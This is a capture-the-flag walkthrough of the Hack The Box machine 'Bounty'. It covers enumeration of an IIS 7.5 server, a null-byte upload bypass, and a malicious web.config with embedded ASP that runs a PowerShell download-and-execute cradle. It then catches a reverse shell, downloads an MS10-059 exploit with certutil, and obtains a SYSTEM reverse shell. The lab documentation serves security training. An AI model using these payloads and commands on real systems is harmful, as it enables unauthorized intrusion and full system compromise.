HTB - Bounty
Getting Root
The box only had port 80 running which had an application that allows to upload files while preventing asp, aspx and few other file extensions.
I was bale to bypass the upload filter using a null byte
%00.jpgbut the application generated an error giving a clue about something related to web.config.After some research about web.config, I was able to find an article describing how to upload a web.config file with ASP code embedded and I was able to get a shell.
For privilege escalation, I was able to get system using MS10-059
Tools used:
nmap, nikto, gobuster, nishang, windows-exploit-suggester.py
Nmap
# Nmap 7.80 scan initiated Sun Mar 8 22:08:29 2020 as: nmap -Pn -sC -sV -p 80 -oN nmap/Bounty_nmap.txt 10.10.10.93
Nmap scan report for 10.10.10.93
Host is up (0.040s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Mar 8 22:08:50 2020 -- 1 IP address (1 host up) scanned in 21.20 seconds
# Nmap 7.80 scan initiated Sun Mar 8 22:08:50 2020 as: nmap -Pn -sU -oN nmap/Bounty.udp 10.10.10.93
Nmap scan report for 10.10.10.93
Host is up.
All 1000 scanned ports on 10.10.10.93 are open|filtered
# Nmap done at Sun Mar 8 22:12:12 2020 -- 1 IP address (1 host up) scanned in 201.34 secondsEnumerating HTTP
Port 80 just shows a picture. I saved the picture as merling.jpg and used strings, steghide and exiftool but didn't find anything.
Nikto
Nothing much was found with Nikto
nikto -host http://10.10.10.93
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.93
+ Target Hostname: 10.10.10.93
+ Target Port: 80
+ Start Time: 2020-03-08 22:18:44 (GMT-4)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/7.5
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-aspnet-version header: 2.0.50727
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ 7863 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2020-03-08 22:24:28 (GMT-4) (344 seconds)
---------------------------------------------------------------------------
Gobuster
gobuster dir -u http://10.10.10.93 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster/Bounty_gobuster.txt -t 40 -x asp,aspx,html,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.93
[+] Threads: 40
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: asp,aspx,html,txt
[+] Timeout: 10s
===============================================================
2020/03/08 22:24:47 Starting gobuster
===============================================================
/transfer.aspx (Status: 200)
/UploadedFiles (Status: 301)
/uploadedFiles (Status: 301)
/uploadedfiles (Status: 301)
===============================================================
2020/03/08 22:44:08 Finished
===============================================================
Testing transfer.aspx
I tried uploading a file with ASP, ASPX and it failed. But when I uploaded the merling.jpg file it worked. Based on that, I used Burp proxy to intercept the request and used a null byte %00 to attempt to bypass the upload filter.
When I tried to execute the shellie.aspx file http://10.10.10.93/UploadedFiles/shellie.aspx I got the following error below.
I have no idea what to do from here, so I googled "IIS 7.5 web.config exploit" and to my surprise, I found the following link stating that we can actually upload a *.config file with asp code and it would work.
Here is the link:
Explanation of web.config as quoted from the link above:
Web.config
What is a web.config file?
A web.config file lets you customize the way your site or a specific directory on your site behaves. For example, if you place a web.config file in your root directory, it will affect your entire site. If you place it in a /content directory, it will only affect that directory.
With a web.config file, you can control:
Database connection strings. Error behavior. Security.web.config files are XML documents. ‘.config’ is not an extension like ‘.html’ or ‘.txt’.
Getting a Reverse Shell
The link I found on google, refers to the following link below for the code they used in order to get RCE.
I used the example code I found but with a few modifications:
# cat web.config
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
<appSettings>
</appSettings>
</configuration>
<!–-
<% Response.write("-"&"->")
Response.write("<pre>")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("ping 10.10.14.3")
output1 = cmd1.StdOut.Readall()
set cmd1 = nothing: Set wShell1 = nothing
Response.write(output1)
Response.write("</pre><!-"&"-") %>
-–>
Uploading the web.config file
I can also confirm using tcpdump:
# tcpdump -nni tun0 icmp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
23:58:28.277292 IP 10.10.10.93 > 10.10.14.3: ICMP echo request, id 1, seq 1, length 40
23:58:28.277378 IP 10.10.14.3 > 10.10.10.93: ICMP echo reply, id 1, seq 1, length 40
23:58:29.271690 IP 10.10.10.93 > 10.10.14.3: ICMP echo request, id 1, seq 2, length 40
23:58:29.271752 IP 10.10.14.3 > 10.10.10.93: ICMP echo reply, id 1, seq 2, length 40
23:58:30.270135 IP 10.10.10.93 > 10.10.14.3: ICMP echo request, id 1, seq 3, length 40
23:58:30.270165 IP 10.10.14.3 > 10.10.10.93: ICMP echo reply, id 1, seq 3, length 40
23:58:31.268337 IP 10.10.10.93 > 10.10.14.3: ICMP echo request, id 1, seq 4, length 40
23:58:31.268366 IP 10.10.14.3 > 10.10.10.93: ICMP echo reply, id 1, seq 4, length 40
^C
8 packets captured
8 packets received by filter
0 packets dropped by kernel
I used nishang reverse powershell script and modified the web.config code as follows:
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
<appSettings>
</appSettings>
</configuration>
<!–-
<% Response.write("-"&"->")
Response.write("<pre>")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("cmd.exe /c powershell.exe -c iex(New-Object Net.WebClient).DownloadString('http://10.10.14.3/pwsh.ps1')")
output1 = cmd1.StdOut.Readall()
set cmd1 = nothing: Set wShell1 = nothing
Response.write(output1)
Response.write("</pre><!-"&"-") %>
-–>
Uploaded the new web.config file
Executed it via
http://10.10.10.93/UploadedFiles/web.configStarted the listener on port 8008 ( I edited on the nishang reverse tcp script)
Got a shell as merlin
Started python http server
# To server the nishang revser powershell script
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.93 - - [09/Mar/2020 00:21:47] "GET /pwsh.ps1 HTTP/1.1" 200 -
# Listenner to capture the shell
# rlwrap nc -lnvp 8008
listening on [any] 8008 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.93] 49158
Windows PowerShell running as user BOUNTY$ on BOUNTY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\windows\system32\inetsrv>whoami
bounty\merlin
PS C:\users\merlin\desktop> systeminfo
Host Name: BOUNTY
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-402-3606965-84760
Original Install Date: 5/30/2018, 12:22:24 AM
System Boot Time: 3/9/2020, 5:22:56 AM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,586 MB
Virtual Memory: Max Size: 4,095 MB
Virtual Memory: Available: 3,594 MB
Virtual Memory: In Use: 501 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.93Privilege Escalation
I used the windows exploit suggester
./windows-exploit-suggester.py -d 2020-03-06-mssb.xls -i sysinfo_bounty
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
I used MS10-059. A google search on MS10-059 github takes you to the following link with an exe executable
Download the executable to the target using certutil
PS C:\users\merlin\documents> certutil -urlcache -f -split http://10.10.14.3/MS10-059.exe Executing the exploit
PS C:\users\merlin\documents> .\MS10-059.exe
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->
Usage: Chimichurri.exe ipaddress port <BR>
Started a Listener
rlwrap nc -lnvp 9002
listening on [any] 9002 ...Got Reverse Shell as SYSTEM
# On the target box
PS C:\users\merlin\documents> .\MS10-059.exe 10.10.14.3 9002
# On my Kali box
rlwrap nc -lnvp 9002
listening on [any] 9002 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.93] 49181
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\users\merlin\documents>whoami
whoami
nt authority\system
C:\users\merlin\documents>
Last updated